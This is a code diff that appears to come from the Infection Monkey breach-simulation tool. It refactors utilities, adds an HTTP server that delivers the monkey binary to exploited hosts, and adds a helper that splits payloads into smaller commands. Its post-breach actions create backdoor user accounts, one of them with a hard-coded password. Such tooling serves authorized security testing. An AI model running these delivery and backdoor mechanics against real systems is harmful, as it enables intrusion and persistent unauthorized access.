http_path, http_thread = HTTPTools.create_locked_transfer(host, src_path, local_ip, local_port)
|
||||
if not http_path:
|
||||
raise Exception("Http transfer creation failed.")
|
||||
LOG.info("Started http server on %s", http_path)
|
||||
return http_path, http_thread
|
||||
|
||||
@staticmethod
|
||||
def create_locked_transfer(host, src_path, local_ip=None, local_port=None):
|
||||
"""
|
||||
|
@ -60,3 +69,22 @@ class HTTPTools(object):
|
|||
httpd.start()
|
||||
lock.acquire()
|
||||
return "http://%s:%s/%s" % (local_ip, local_port, urllib.quote(os.path.basename(src_path))), httpd
|
||||
|
||||
|
||||
class MonkeyHTTPServer(HTTPTools):
|
||||
def __init__(self, host):
|
||||
super(MonkeyHTTPServer, self).__init__()
|
||||
self.http_path = None
|
||||
self.http_thread = None
|
||||
self.host = host
|
||||
|
||||
def start(self):
|
||||
# Get the monkey exe for the host and its path
|
||||
src_path = try_get_target_monkey(self.host)
|
||||
self.http_path, self.http_thread = MonkeyHTTPServer.try_create_locked_transfer(self.host, src_path)
|
||||
|
||||
def stop(self):
|
||||
if not self.http_path or not self.http_thread:
|
||||
raise RuntimeError("Can't stop http server that wasn't started!")
|
||||
self.http_thread.join(DOWNLOAD_TIMEOUT)
|
||||
self.http_thread.stop()
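For reference, a minimal sketch of how an exploiter is expected to drive MonkeyHTTPServer, mirroring the calls MSSQLExploiter makes above (illustrative only; host stands for the exploiter's target host object):

# Sketch only -- not part of this commit.
from infection_monkey.exploit.tools.helpers import get_monkey_dest_path
from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer

server = MonkeyHTTPServer(host)  # host: the exploiter's target
server.start()                   # picks a monkey binary and serves it over a locked HTTP transfer
try:
    dst_path = get_monkey_dest_path(server.http_path)
    # ... make the victim download server.http_path to dst_path ...
finally:
    server.stop()                # joins the transfer thread, then stops the server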
|
||||
|
|
|
@@ -0,0 +1,63 @@
import logging
import textwrap

LOG = logging.getLogger(__name__)


class Payload(object):
    """
    Class for defining and parsing a payload (commands with prefixes/suffixes)
    """

    def __init__(self, command, prefix="", suffix=""):
        self.command = command
        self.prefix = prefix
        self.suffix = suffix

    def get_payload(self, command=""):
        """
        Returns prefixed and suffixed command (payload)
        :param command: Command to suffix/prefix. If no command is passed than objects' property is used
        :return: prefixed and suffixed command (full payload)
        """
        if not command:
            command = self.command
        return "{}{}{}".format(self.prefix, command, self.suffix)


class LimitedSizePayload(Payload):
    """
    Class for defining and parsing commands/payloads
    """

    def __init__(self, command, max_length, prefix="", suffix=""):
        """
        :param command: command
        :param max_length: max length that payload(prefix + command + suffix) can have
        :param prefix: commands prefix
        :param suffix: commands suffix
        """
        super(LimitedSizePayload, self).__init__(command, prefix, suffix)
        self.max_length = max_length

    def is_suffix_and_prefix_too_long(self):
        return self.payload_is_too_long(self.suffix + self.prefix)

    def split_into_array_of_smaller_payloads(self):
        if self.is_suffix_and_prefix_too_long():
            raise Exception("Can't split command into smaller sub-commands because commands' prefix and suffix already "
                            "exceeds required length of command.")
        elif self.command == "":
            return [self.prefix+self.suffix]
        wrapper = textwrap.TextWrapper(drop_whitespace=False, width=self.get_max_sub_payload_length())
        commands = [self.get_payload(part)
                    for part
                    in wrapper.wrap(self.command)]
        return commands

    def get_max_sub_payload_length(self):
        return self.max_length - len(self.prefix) - len(self.suffix)

    def payload_is_too_long(self, command):
        return len(command) >= self.max_length
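A short usage sketch of the splitting helper, inferred from the class above and its unit test below; the module path in the import is an assumption, and the prefix/suffix values are illustrative:

    from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload  # path assumed

    # Split a long command into chunks that each fit a 16-character budget,
    # keeping the same prefix and suffix around every chunk.
    payload = LimitedSizePayload("123456789", max_length=16, prefix="prefix", suffix="suffix")
    print(payload.split_into_array_of_smaller_payloads())
    # -> ['prefix1234suffix', 'prefix5678suffix', 'prefix9suffix']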
@@ -0,0 +1,32 @@
from unittest import TestCase
from payload_parsing import Payload, LimitedSizePayload


class TestPayload(TestCase):
    def test_get_payload(self):
        test_str1 = "abc"
        test_str2 = "atc"
        payload = Payload(command="b", prefix="a", suffix="c")
        assert payload.get_payload() == test_str1 and payload.get_payload("t") == test_str2

    def test_is_suffix_and_prefix_too_long(self):
        pld_fail = LimitedSizePayload("b", 2, "a", "c")
        pld_success = LimitedSizePayload("b", 3, "a", "c")
        assert pld_fail.is_suffix_and_prefix_too_long() and not pld_success.is_suffix_and_prefix_too_long()

    def test_split_into_array_of_smaller_payloads(self):
        test_str1 = "123456789"
        pld1 = LimitedSizePayload(test_str1, max_length=16, prefix="prefix", suffix="suffix")
        array1 = pld1.split_into_array_of_smaller_payloads()
        test1 = bool(array1[0] == "prefix1234suffix" and
                     array1[1] == "prefix5678suffix" and
                     array1[2] == "prefix9suffix")

        test_str2 = "12345678"
        pld2 = LimitedSizePayload(test_str2, max_length=16, prefix="prefix", suffix="suffix")
        array2 = pld2.split_into_array_of_smaller_payloads()
        test2 = bool(array2[0] == "prefix1234suffix" and
                     array2[1] == "prefix5678suffix" and len(array2) == 2)

        assert test1 and test2
@@ -8,7 +8,7 @@ import os
import sys
import traceback

import infection_monkey.utils as utils
from infection_monkey.utils.monkey_log_path import get_dropper_log_path, get_monkey_log_path
from infection_monkey.config import WormConfiguration, EXTERNAL_CONFIG_FILE
from infection_monkey.dropper import MonkeyDrops
from infection_monkey.model import MONKEY_ARG, DROPPER_ARG

@@ -79,10 +79,10 @@ def main():

    try:
        if MONKEY_ARG == monkey_mode:
            log_path = utils.get_monkey_log_path()
            log_path = get_monkey_log_path()
            monkey_cls = InfectionMonkey
        elif DROPPER_ARG == monkey_mode:
            log_path = utils.get_dropper_log_path()
            log_path = get_dropper_log_path()
            monkey_cls = MonkeyDrops
        else:
            return True

@@ -127,8 +127,8 @@ def main():
            json.dump(json_dict, config_fo, skipkeys=True, sort_keys=True, indent=4, separators=(',', ': '))

        return True
    except Exception:
        LOG.exception("Exception thrown from monkey's start function")
    except Exception as e:
        LOG.exception("Exception thrown from monkey's start function. More info: {}".format(e))
    finally:
        monkey.cleanup()
@@ -7,7 +7,8 @@ import time
from six.moves import xrange

import infection_monkey.tunnel as tunnel
import infection_monkey.utils as utils
from infection_monkey.utils.monkey_dir import create_monkey_dir, get_monkey_dir_path, remove_monkey_dir
from infection_monkey.utils.monkey_log_path import get_monkey_log_path
from infection_monkey.config import WormConfiguration
from infection_monkey.control import ControlClient
from infection_monkey.model import DELAY_DELETE_CMD

@@ -26,6 +27,7 @@ from infection_monkey.windows_upgrader import WindowsUpgrader
from infection_monkey.post_breach.post_breach_handler import PostBreach
from common.utils.attack_utils import ScanStatus
from infection_monkey.exploit.tools.helpers import get_interface_to_target
from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError

__author__ = 'itamar'

@@ -90,7 +92,7 @@ class InfectionMonkey(object):
        self.set_default_port()

        # Create a dir for monkey files if there isn't one
        utils.create_monkey_dir()
        create_monkey_dir()

        if WindowsUpgrader.should_upgrade():
            self._upgrading_to_64 = True

@@ -244,8 +246,8 @@ class InfectionMonkey(object):

    @staticmethod
    def self_delete():
        status = ScanStatus.USED if utils.remove_monkey_dir() else ScanStatus.SCANNED
        T1107Telem(status, utils.get_monkey_dir_path()).send()
        status = ScanStatus.USED if remove_monkey_dir() else ScanStatus.SCANNED
        T1107Telem(status, get_monkey_dir_path()).send()

        if WormConfiguration.self_delete_in_cleanup \
                and -1 == sys.executable.find('python'):

@@ -269,7 +271,7 @@ class InfectionMonkey(object):
            T1107Telem(status, sys.executable).send()

    def send_log(self):
        monkey_log_path = utils.get_monkey_log_path()
        monkey_log_path = get_monkey_log_path()
        if os.path.exists(monkey_log_path):
            with open(monkey_log_path, 'r') as f:
                log = f.read()

@@ -300,7 +302,11 @@ class InfectionMonkey(object):
                    return True
                else:
                    LOG.info("Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__)

            except ExploitingVulnerableMachineError as exc:
                LOG.error("Exception while attacking %s using %s: %s",
                          machine, exploiter.__class__.__name__, exc)
                self.successfully_exploited(machine, exploiter)
                return True
            except Exception as exc:
                LOG.exception("Exception while attacking %s using %s: %s",
                              machine, exploiter.__class__.__name__, exc)
@@ -10,7 +10,7 @@ import re
from six.moves import range

from infection_monkey.pyinstaller_utils import get_binary_file_path
from infection_monkey.utils import is_64bit_python
from infection_monkey.utils.environment import is_64bit_python

DEFAULT_TIMEOUT = 10
BANNER_READ = 1024
@@ -1,21 +1,16 @@
import datetime
from common.data.post_breach_consts import POST_BREACH_BACKDOOR_USER
from infection_monkey.post_breach.pba import PBA
from infection_monkey.config import WormConfiguration


__author__ = 'danielg'

LINUX_COMMANDS = ['useradd', '-M', '--expiredate',
                  datetime.datetime.today().strftime('%Y-%m-%d'), '--inactive', '0', '-c', 'MONKEY_USER',
                  WormConfiguration.user_to_add]

WINDOWS_COMMANDS = ['net', 'user', WormConfiguration.user_to_add,
                    WormConfiguration.remote_user_pass,
                    '/add', '/ACTIVE:NO']
from infection_monkey.utils.users import get_commands_to_add_user


class BackdoorUser(PBA):
    def __init__(self):
        super(BackdoorUser, self).__init__("Backdoor user",
                                           linux_cmd=' '.join(LINUX_COMMANDS),
                                           windows_cmd=WINDOWS_COMMANDS)
        linux_cmds, windows_cmds = get_commands_to_add_user(
            WormConfiguration.user_to_add,
            WormConfiguration.remote_user_pass)
        super(BackdoorUser, self).__init__(
            POST_BREACH_BACKDOOR_USER,
            linux_cmd=' '.join(linux_cmds),
            windows_cmd=windows_cmds)
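For reference, a sketch of what the refactored helper returns; the username and password here are placeholders, and the exact date value depends on the day it runs:

    from infection_monkey.utils.users import get_commands_to_add_user

    linux_cmds, windows_cmds = get_commands_to_add_user("monkey-user", "ExamplePass1!")
    # linux_cmds   -> ['useradd', '-M', '--expiredate', '<today>', '--inactive', '0', '-c', 'MONKEY_USER', 'monkey-user']
    # windows_cmds -> ['net', 'user', 'monkey-user', 'ExamplePass1!', '/add', '/ACTIVE:NO']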
@@ -0,0 +1,143 @@
import logging
import os
import random
import string
import subprocess
import time

import win32event

from infection_monkey.utils.windows.auto_new_user import AutoNewUser, NewUserError
from common.data.post_breach_consts import POST_BREACH_COMMUNICATE_AS_NEW_USER
from infection_monkey.post_breach.pba import PBA
from infection_monkey.telemetry.post_breach_telem import PostBreachTelem
from infection_monkey.utils.environment import is_windows_os
from infection_monkey.utils.linux.users import get_linux_commands_to_delete_user, get_linux_commands_to_add_user

PING_TEST_DOMAIN = "google.com"

PING_WAIT_TIMEOUT_IN_MILLISECONDS = 20 * 1000

CREATED_PROCESS_AS_USER_PING_SUCCESS_FORMAT = "Created process '{}' as user '{}', and successfully pinged."
CREATED_PROCESS_AS_USER_PING_FAILED_FORMAT = "Created process '{}' as user '{}', but failed to ping (exit status {})."

USERNAME = "somenewuser"
PASSWORD = "N3WPa55W0rD!1"

logger = logging.getLogger(__name__)


class CommunicateAsNewUser(PBA):
    """
    This PBA creates a new user, and then pings google as that user. This is used for a Zero Trust test of the People
    pillar. See the relevant telemetry processing to see what findings are created.
    """

    def __init__(self):
        super(CommunicateAsNewUser, self).__init__(name=POST_BREACH_COMMUNICATE_AS_NEW_USER)

    def run(self):
        username = CommunicateAsNewUser.get_random_new_user_name()
        if is_windows_os():
            self.communicate_as_new_user_windows(username)
        else:
            self.communicate_as_new_user_linux(username)

    @staticmethod
    def get_random_new_user_name():
        return USERNAME + ''.join(random.choice(string.ascii_lowercase) for _ in range(5))

    def communicate_as_new_user_linux(self, username):
        try:
            # add user + ping
            linux_cmds = get_linux_commands_to_add_user(username)
            commandline = "ping -c 1 {}".format(PING_TEST_DOMAIN)
            linux_cmds.extend([";", "sudo", "-u", username, commandline])
            final_command = ' '.join(linux_cmds)
            exit_status = os.system(final_command)
            self.send_ping_result_telemetry(exit_status, commandline, username)
            # delete the user, async in case it gets stuck.
            _ = subprocess.Popen(
                get_linux_commands_to_delete_user(username), stderr=subprocess.STDOUT, shell=True)
            # Leaking the process on purpose - nothing we can do if it's stuck.
        except subprocess.CalledProcessError as e:
            PostBreachTelem(self, (e.output, False)).send()

    def communicate_as_new_user_windows(self, username):
        # Importing these only on windows, as they won't exist on linux.
        import win32con
        import win32process
        import win32api

        try:
            with AutoNewUser(username, PASSWORD) as new_user:
                # Using os.path is OK, as this is on windows for sure
                ping_app_path = os.path.join(os.environ["WINDIR"], "system32", "PING.exe")
                if not os.path.exists(ping_app_path):
                    PostBreachTelem(self, ("{} not found.".format(ping_app_path), False)).send()
                    return  # Can't continue without ping.

                try:
                    # Open process as that user:
                    # https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessasusera
                    commandline = "{} {} {} {}".format(ping_app_path, PING_TEST_DOMAIN, "-n", "1")
                    process_handle, thread_handle, _, _ = win32process.CreateProcessAsUser(
                        new_user.get_logon_handle(),  # A handle to the primary token that represents a user.
                        None,  # The name of the module to be executed.
                        commandline,  # The command line to be executed.
                        None,  # Process attributes
                        None,  # Thread attributes
                        True,  # Should inherit handles
                        win32con.NORMAL_PRIORITY_CLASS,  # The priority class and the creation of the process.
                        None,  # An environment block for the new process. If this parameter is NULL, the new process
                        # uses the environment of the calling process.
                        None,  # CWD. If this parameter is NULL, the new process will have the same current drive and
                        # directory as the calling process.
                        win32process.STARTUPINFO()  # STARTUPINFO structure.
                        # https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/ns-processthreadsapi-startupinfoa
                    )

                    logger.debug(
                        "Waiting for ping process to finish. Timeout: {}ms".format(PING_WAIT_TIMEOUT_IN_MILLISECONDS))

                    # Ignoring return code, as we'll use `GetExitCode` to determine the state of the process later.
                    _ = win32event.WaitForSingleObject(  # Waits until the specified object is signaled, or time-out.
                        process_handle,  # Ping process handle
                        PING_WAIT_TIMEOUT_IN_MILLISECONDS  # Timeout in milliseconds
                    )

                    ping_exit_code = win32process.GetExitCodeProcess(process_handle)

                    self.send_ping_result_telemetry(ping_exit_code, commandline, username)
                except Exception as e:
                    # If failed on 1314, it's possible to try to elevate the rights of the current user with the
                    # "Replace a process level token" right, using Local Security Policy editing.
                    PostBreachTelem(self, (
                        "Failed to open process as user {}. Error: {}".format(username, str(e)), False)).send()
                finally:
                    try:
                        win32api.CloseHandle(process_handle)
                        win32api.CloseHandle(thread_handle)
                    except Exception as err:
                        logger.error("Close handle error: " + str(err))
        except subprocess.CalledProcessError as err:
            PostBreachTelem(self, (
                "Couldn't create the user '{}'. Error output is: '{}'".format(username, str(err)),
                False)).send()
        except NewUserError as e:
            PostBreachTelem(self, (str(e), False)).send()

    def send_ping_result_telemetry(self, exit_status, commandline, username):
        """
        Parses the result of ping and sends telemetry accordingly.

        :param exit_status: In both Windows and Linux, 0 exit code from Ping indicates success.
        :param commandline: Exact commandline which was executed, for reporting back.
        :param username: Username from which the command was executed, for reporting back.
        """
        if exit_status == 0:
            PostBreachTelem(self, (
                CREATED_PROCESS_AS_USER_PING_SUCCESS_FORMAT.format(commandline, username), True)).send()
        else:
            PostBreachTelem(self, (
                CREATED_PROCESS_AS_USER_PING_FAILED_FORMAT.format(commandline, username, exit_status), False)).send()
@@ -1,11 +1,12 @@
import os
import logging

from infection_monkey.utils import is_windows_os
from common.data.post_breach_consts import POST_BREACH_FILE_EXECUTION
from infection_monkey.utils.environment import is_windows_os
from infection_monkey.post_breach.pba import PBA
from infection_monkey.control import ControlClient
from infection_monkey.config import WormConfiguration
from infection_monkey.utils import get_monkey_dir_path
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
from common.utils.attack_utils import ScanStatus
from infection_monkey.exploit.tools.helpers import get_interface_to_target

@@ -27,7 +28,7 @@ class UsersPBA(PBA):
    Defines user's configured post breach action.
    """
    def __init__(self):
        super(UsersPBA, self).__init__("File execution")
        super(UsersPBA, self).__init__(POST_BREACH_FILE_EXECUTION)
        self.filename = ''
        if not is_windows_os():
            # Add linux commands to PBA's
@@ -3,7 +3,7 @@ import subprocess

from common.utils.attack_utils import ScanStatus
from infection_monkey.telemetry.post_breach_telem import PostBreachTelem
from infection_monkey.utils import is_windows_os
from infection_monkey.utils.environment import is_windows_os
from infection_monkey.config import WormConfiguration
from infection_monkey.telemetry.attack.t1064_telem import T1064Telem

@@ -12,6 +12,7 @@ LOG = logging.getLogger(__name__)

__author__ = 'VakarisZ'

EXECUTION_WITHOUT_OUTPUT = "(PBA execution produced no output)"

class PBA(object):
    """

@@ -20,7 +21,8 @@ class PBA(object):
    def __init__(self, name="unknown", linux_cmd="", windows_cmd=""):
        """
        :param name: Name of post breach action.
        :param command: Command that will be executed on breached machine
        :param linux_cmd: Command that will be executed on breached machine
        :param windows_cmd: Command that will be executed on breached machine
        """
        self.command = PBA.choose_command(linux_cmd, windows_cmd)
        self.name = name

@@ -73,7 +75,10 @@ class PBA(object):
        :return: Tuple of command's output string and boolean, indicating if it succeeded
        """
        try:
            return subprocess.check_output(self.command, stderr=subprocess.STDOUT, shell=True), True
            output = subprocess.check_output(self.command, stderr=subprocess.STDOUT, shell=True)
            if not output:
                output = EXECUTION_WITHOUT_OUTPUT
            return output, True
        except subprocess.CalledProcessError as e:
            # Return error output of the command
            return e.output, False
@@ -3,7 +3,7 @@ import inspect
import importlib
from infection_monkey.post_breach.pba import PBA
from infection_monkey.post_breach.actions import get_pba_files
from infection_monkey.utils import is_windows_os
from infection_monkey.utils.environment import is_windows_os

LOG = logging.getLogger(__name__)

@@ -25,8 +25,12 @@ class PostBreach(object):
        Executes all post breach actions.
        """
        for pba in self.pba_list:
            pba.run()
        LOG.info("Post breach actions executed")
            try:
                LOG.debug("Executing PBA: '{}'".format(pba.name))
                pba.run()
            except Exception as e:
                LOG.error("PBA {} failed. Error info: {}".format(pba.name, e))
        LOG.info("All PBAs executed. Total {} executed.".format(len(self.pba_list)))

    @staticmethod
    def config_to_pba_list():

@@ -45,7 +49,9 @@ class PostBreach(object):
                       if ((m[1].__module__ == module.__name__) and issubclass(m[1], PBA))]
        # Get post breach action object from class
        for pba_class in pba_classes:
            LOG.debug("Checking if should run PBA {}".format(pba_class.__name__))
            if pba_class.should_run(pba_class.__name__):
                pba = pba_class()
                pba_list.append(pba)
                LOG.debug("Added PBA {} to PBA list".format(pba_class.__name__))
        return pba_list
@@ -62,7 +62,7 @@ a. Build sambacry binaries yourself
  a.1. Install gcc-multilib if it's not installed
       sudo apt-get install gcc-multilib
  a.2. Build the binaries
       cd [code location]/infection_monkey/monkey_utils/sambacry_monkey_runner
       cd [code location]/infection_monkey/exploit/sambacry_monkey_runner
       ./build.sh

b. Download our pre-built sambacry binaries
@ -1,62 +0,0 @@
|
|||
import os
|
||||
import shutil
|
||||
import struct
|
||||
import sys
|
||||
import tempfile
|
||||
|
||||
from infection_monkey.config import WormConfiguration
|
||||
|
||||
|
||||
def get_monkey_log_path():
|
||||
return os.path.expandvars(WormConfiguration.monkey_log_path_windows) if sys.platform == "win32" \
|
||||
else WormConfiguration.monkey_log_path_linux
|
||||
|
||||
|
||||
def get_dropper_log_path():
|
||||
return os.path.expandvars(WormConfiguration.dropper_log_path_windows) if sys.platform == "win32" \
|
||||
else WormConfiguration.dropper_log_path_linux
|
||||
|
||||
|
||||
def is_64bit_windows_os():
|
||||
"""
|
||||
Checks for 64 bit Windows OS using environment variables.
|
||||
"""
|
||||
return 'PROGRAMFILES(X86)' in os.environ
|
||||
|
||||
|
||||
def is_64bit_python():
|
||||
return struct.calcsize("P") == 8
|
||||
|
||||
|
||||
def is_windows_os():
|
||||
return sys.platform.startswith("win")
|
||||
|
||||
|
||||
def utf_to_ascii(string):
|
||||
# Converts utf string to ascii. Safe to use even if string is already ascii.
|
||||
udata = string.decode("utf-8")
|
||||
return udata.encode("ascii", "ignore")
|
||||
|
||||
|
||||
def create_monkey_dir():
|
||||
"""
|
||||
Creates directory for monkey and related files
|
||||
"""
|
||||
if not os.path.exists(get_monkey_dir_path()):
|
||||
os.mkdir(get_monkey_dir_path())
|
||||
|
||||
|
||||
def remove_monkey_dir():
|
||||
"""
|
||||
Removes monkey's root directory
|
||||
:return True if removed without errors and False otherwise
|
||||
"""
|
||||
try:
|
||||
shutil.rmtree(get_monkey_dir_path())
|
||||
return True
|
||||
except Exception:
|
||||
return False
|
||||
|
||||
|
||||
def get_monkey_dir_path():
|
||||
return os.path.join(tempfile.gettempdir(), WormConfiguration.monkey_dir_name)
|
|
@@ -0,0 +1,18 @@
import os
import struct
import sys


def is_64bit_windows_os():
    """
    Checks for 64 bit Windows OS using environment variables.
    """
    return 'PROGRAMFILES(X86)' in os.environ


def is_64bit_python():
    return struct.calcsize("P") == 8


def is_windows_os():
    return sys.platform.startswith("win")
@@ -0,0 +1,21 @@
import datetime


def get_linux_commands_to_add_user(username):
    return [
        'useradd',
        '-M',  # Do not create homedir
        '--expiredate',
        datetime.datetime.today().strftime('%Y-%m-%d'),
        '--inactive',
        '0',
        '-c',  # Comment
        'MONKEY_USER',  # Comment
        username]


def get_linux_commands_to_delete_user(username):
    return [
        'deluser',
        username
    ]
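As a quick illustration (the username is a placeholder, the date depends on the run day), joining the returned list yields the shell command the PBA ultimately executes:

    from infection_monkey.utils.linux.users import get_linux_commands_to_add_user

    # Same ' '.join pattern used by the CommunicateAsNewUser PBA above.
    cmd = ' '.join(get_linux_commands_to_add_user("monkey-user"))
    # e.g. "useradd -M --expiredate 2019-07-01 --inactive 0 -c MONKEY_USER monkey-user"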
@@ -0,0 +1,29 @@
import os
import shutil
import tempfile

from infection_monkey.config import WormConfiguration


def create_monkey_dir():
    """
    Creates directory for monkey and related files
    """
    if not os.path.exists(get_monkey_dir_path()):
        os.mkdir(get_monkey_dir_path())


def remove_monkey_dir():
    """
    Removes monkey's root directory
    :return True if removed without errors and False otherwise
    """
    try:
        shutil.rmtree(get_monkey_dir_path())
        return True
    except Exception:
        return False


def get_monkey_dir_path():
    return os.path.join(tempfile.gettempdir(), WormConfiguration.monkey_dir_name)
@@ -0,0 +1,14 @@
import os
import sys

from infection_monkey.config import WormConfiguration


def get_monkey_log_path():
    return os.path.expandvars(WormConfiguration.monkey_log_path_windows) if sys.platform == "win32" \
        else WormConfiguration.monkey_log_path_linux


def get_dropper_log_path():
    return os.path.expandvars(WormConfiguration.dropper_log_path_windows) if sys.platform == "win32" \
        else WormConfiguration.dropper_log_path_linux
@@ -0,0 +1,10 @@
from infection_monkey.utils.linux.users import get_linux_commands_to_add_user
from infection_monkey.utils.windows.users import get_windows_commands_to_add_user


def get_commands_to_add_user(username, password):
    linux_cmds = get_linux_commands_to_add_user(username)
    windows_cmds = get_windows_commands_to_add_user(username, password)
    return linux_cmds, windows_cmds
@@ -0,0 +1,69 @@
import logging
import subprocess

from infection_monkey.post_breach.actions.add_user import BackdoorUser
from infection_monkey.utils.windows.users import get_windows_commands_to_delete_user, get_windows_commands_to_add_user

logger = logging.getLogger(__name__)


class NewUserError(Exception):
    pass


class AutoNewUser(object):
    """
    RAII object to use for creating and using a new user in Windows. Use with `with`.
    User will be created when the instance is instantiated.
    User will log on at the start of the `with` scope.
    User will log off and get deleted at the end of said `with` scope.

    Example:
        # Created                                   # Logged on
        with AutoNewUser("user", "pass") as new_user:
            ...
            ...
        # Logged off and deleted
        ...
    """
    def __init__(self, username, password):
        """
        Creates a user with the username + password.
        :raises: subprocess.CalledProcessError if failed to add the user.
        """
        self.username = username
        self.password = password

        windows_cmds = get_windows_commands_to_add_user(self.username, self.password, True)
        _ = subprocess.check_output(windows_cmds, stderr=subprocess.STDOUT, shell=True)

    def __enter__(self):
        # Importing these only on windows, as they won't exist on linux.
        import win32security
        import win32con

        try:
            # Logon as new user: https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonusera
            self.logon_handle = win32security.LogonUser(
                self.username,
                ".",  # Use current domain.
                self.password,
                win32con.LOGON32_LOGON_INTERACTIVE,  # Logon type - interactive (normal user).
                win32con.LOGON32_PROVIDER_DEFAULT)  # Which logon provider to use - whatever Windows offers.
        except Exception as err:
            raise NewUserError("Can't logon as {}. Error: {}".format(self.username, str(err)))
        return self

    def get_logon_handle(self):
        return self.logon_handle

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Logoff
        self.logon_handle.Close()

        # Try to delete user
        try:
            _ = subprocess.Popen(
                get_windows_commands_to_delete_user(self.username), stderr=subprocess.STDOUT, shell=True)
        except Exception as err:
            raise NewUserError("Can't delete user {}. Info: {}".format(self.username, err))
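A minimal, Windows-only usage sketch of the context manager above (credentials are placeholders); it mirrors how the CommunicateAsNewUser PBA drives it:

    from infection_monkey.utils.windows.auto_new_user import AutoNewUser, NewUserError

    try:
        with AutoNewUser("example-user", "ExamplePass1!") as new_user:
            # Inside the block the logon token can be handed to CreateProcessAsUser.
            token = new_user.get_logon_handle()
    except NewUserError as e:
        print("Could not log on as the new user: {}".format(e))
    # On leaving the block the user is logged off and deleted.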
@@ -0,0 +1,18 @@
def get_windows_commands_to_add_user(username, password, should_be_active=False):
    windows_cmds = [
        'net',
        'user',
        username,
        password,
        '/add']
    if not should_be_active:
        windows_cmds.append('/ACTIVE:NO')
    return windows_cmds


def get_windows_commands_to_delete_user(username):
    return [
        'net',
        'user',
        username,
        '/delete']
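For instance (placeholder credentials), the helper produces the familiar `net user` invocation, with the account left inactive unless explicitly requested:

    get_windows_commands_to_add_user("monkey-user", "ExamplePass1!")
    # -> ['net', 'user', 'monkey-user', 'ExamplePass1!', '/add', '/ACTIVE:NO']
    get_windows_commands_to_add_user("monkey-user", "ExamplePass1!", should_be_active=True)
    # -> ['net', 'user', 'monkey-user', 'ExamplePass1!', '/add']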
@@ -10,7 +10,7 @@ from infection_monkey.config import WormConfiguration
from infection_monkey.control import ControlClient
from infection_monkey.exploit.tools.helpers import build_monkey_commandline_explicitly
from infection_monkey.model import MONKEY_CMDLINE_WINDOWS
from infection_monkey.utils import is_windows_os, is_64bit_windows_os, is_64bit_python
from infection_monkey.utils.environment import is_windows_os, is_64bit_windows_os, is_64bit_python

__author__ = 'itay.mizeretz'
@@ -21,7 +21,7 @@ json_setup_logging(default_path=os.path.join(MONKEY_ISLAND_ABS_PATH, 'cc', 'isla
logger = logging.getLogger(__name__)

from monkey_island.cc.app import init_app
from monkey_island.cc.exporter_init import populate_exporter_list
from monkey_island.cc.services.reporting.exporter_init import populate_exporter_list
from monkey_island.cc.utils import local_ip_addresses
from monkey_island.cc.environment.environment import env
from monkey_island.cc.database import is_db_server_up, get_db_version
@@ -38,6 +38,8 @@ class Monkey(Document):
    ttl_ref = ReferenceField(MonkeyTtl)
    tunnel = ReferenceField("self")
    command_control_channel = EmbeddedDocumentField(CommandControlChannel)
    aws_instance_id = StringField(required=False)  # This field only exists when the monkey is running on an AWS
    # instance. See https://github.com/guardicore/monkey/issues/426.

    # LOGIC
    @staticmethod
@@ -0,0 +1,32 @@
from common.data.zero_trust_consts import TEST_MALICIOUS_ACTIVITY_TIMELINE, STATUS_VERIFY
from monkey_island.cc.models.zero_trust.finding import Finding


class AggregateFinding(Finding):
    @staticmethod
    def create_or_add_to_existing(test, status, events):
        """
        Create a new finding or add the events to an existing one if it's the same (same meaning same status and same
        test).

        :raises: Assertion error if this is used when there's more then one finding which fits the query - this is not
        when this function should be used.
        """
        existing_findings = Finding.objects(test=test, status=status)
        assert (len(existing_findings) < 2), "More than one finding exists for {}:{}".format(test, status)

        if len(existing_findings) == 0:
            Finding.save_finding(test, status, events)
        else:
            # Now we know for sure this is the only one
            orig_finding = existing_findings[0]
            orig_finding.add_events(events)
            orig_finding.save()


def add_malicious_activity_to_timeline(events):
    AggregateFinding.create_or_add_to_existing(
        test=TEST_MALICIOUS_ACTIVITY_TIMELINE,
        status=STATUS_VERIFY,
        events=events
    )
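A sketch of how telemetry-processing code calls this helper; the constants come from common.data.zero_trust_consts as elsewhere in this change, and the event text is illustrative:

    from common.data.zero_trust_consts import TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED, EVENT_TYPE_MONKEY_LOCAL
    from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding
    from monkey_island.cc.models.zero_trust.event import Event

    events = [Event.create_event(title="AV check",
                                 message="Known AV process found on the machine.",
                                 event_type=EVENT_TYPE_MONKEY_LOCAL)]
    # Repeated calls with the same test/status grow one finding instead of creating duplicates.
    AggregateFinding.create_or_add_to_existing(test=TEST_ENDPOINT_SECURITY_EXISTS,
                                               status=STATUS_PASSED,
                                               events=events)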
@@ -14,12 +14,12 @@ from monkey_island.cc.models.zero_trust.event import Event
class Finding(Document):
    """
    This model represents a Zero-Trust finding: A result of a test the monkey/island might perform to see if a
    specific recommendation of zero trust is upheld or broken.
    specific principle of zero trust is upheld or broken.

    Findings might have the following statuses:
        Failed ❌
            Meaning that we are sure that something is wrong (example: segmentation issue).
        Inconclusive ⁉
        Verify ⁉
            Meaning that we need the user to check something himself (example: 2FA logs, AV missing).
        Passed ✔
            Meaning that we are sure that something is correct (example: Monkey failed exploiting).

@@ -54,3 +54,7 @@ class Finding(Document):
        finding.save()

        return finding

    def add_events(self, events):
        # type: (list) -> None
        self.events.extend(events)
@ -0,0 +1,53 @@
|
|||
from common.data.zero_trust_consts import *
|
||||
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding
|
||||
from monkey_island.cc.models.zero_trust.event import Event
|
||||
from monkey_island.cc.models.zero_trust.finding import Finding
|
||||
from monkey_island.cc.testing.IslandTestCase import IslandTestCase
|
||||
|
||||
|
||||
class TestAggregateFinding(IslandTestCase):
|
||||
def test_create_or_add_to_existing(self):
|
||||
self.fail_if_not_testing_env()
|
||||
self.clean_finding_db()
|
||||
|
||||
test = TEST_MALICIOUS_ACTIVITY_TIMELINE
|
||||
status = STATUS_VERIFY
|
||||
